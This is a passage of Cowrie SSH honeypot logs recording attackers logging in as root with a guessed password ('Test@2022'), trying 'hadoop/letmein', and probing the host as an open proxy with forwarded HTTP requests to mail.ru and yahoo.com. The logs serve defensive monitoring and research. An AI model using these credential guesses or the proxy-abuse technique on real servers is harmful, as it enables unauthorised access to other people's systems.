256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.733771Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:08.983379Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19911,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19911","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.034008Z","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.084106Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4204,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4204","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.224176Z","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.274019Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24987,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24987","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.416168Z","session":"072dc526fccb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.466118Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.516685Z","src_ip":"77.83.207.83","session":"072dc526fccb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47004,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e021d8620e1","protocol":"ssh","message":"New connection: 77.83.207.83:47004 (1.2.3.4:22) [session: 0e021d8620e1]","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.567137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.567924Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.619179Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.873701Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32051,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32051","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.925488Z","session":"0e021d8620e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:09.976433Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7812,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7812","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.121237Z","session":"0e021d8620e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.172144Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56914,"dst_ip":"1.2.3.4","dst_port":22,"session":"aca4c531c631","protocol":"ssh","message":"New connection: 212.227.125.160:56914 (1.2.3.4:22) [session: aca4c531c631]","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.194377Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":8037,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8037","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.317141Z","session":"0e021d8620e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.368361Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.420647Z","src_ip":"77.83.207.83","session":"0e021d8620e1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47103,"dst_ip":"1.2.3.4","dst_port":22,"session":"665b2051cbc4","protocol":"ssh","message":"New connection: 77.83.207.83:47103 (1.2.3.4:22) [session: 665b2051cbc4]","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.469161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.469960Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.520825Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.670114Z","src_ip":"212.227.125.160","session":"aca4c531c631"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.670736Z","src_ip":"212.227.125.160","session":"aca4c531c631"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.769288Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11555,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11555","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.820229Z","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:10.870215Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":10691,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10691","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.012142Z","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.062046Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17512,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17512","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.204468Z","session":"665b2051cbc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.254424Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.305259Z","src_ip":"77.83.207.83","session":"665b2051cbc4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47217,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba6c93a8d2af","protocol":"ssh","message":"New connection: 77.83.207.83:47217 (1.2.3.4:22) [session: ba6c93a8d2af]","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.353853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.354792Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.404129Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.651930Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27105,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27105","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.702486Z","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.752165Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30376,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30376","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.891816Z","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:11.941655Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":7642,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7642","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.083595Z","session":"ba6c93a8d2af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.133076Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.183483Z","src_ip":"77.83.207.83","session":"ba6c93a8d2af"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47327,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad7e8edb238e","protocol":"ssh","message":"New connection: 77.83.207.83:47327 (1.2.3.4:22) [session: ad7e8edb238e]","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.232435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.233313Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.283226Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.532111Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"letmein","message":"login attempt [hadoop/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.539367Z","src_ip":"212.227.125.160","session":"aca4c531c631"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21744,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21744","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.583025Z","session":"ad7e8edb238e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.633510Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":21057,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21057","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.776452Z","session":"ad7e8edb238e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.826764Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
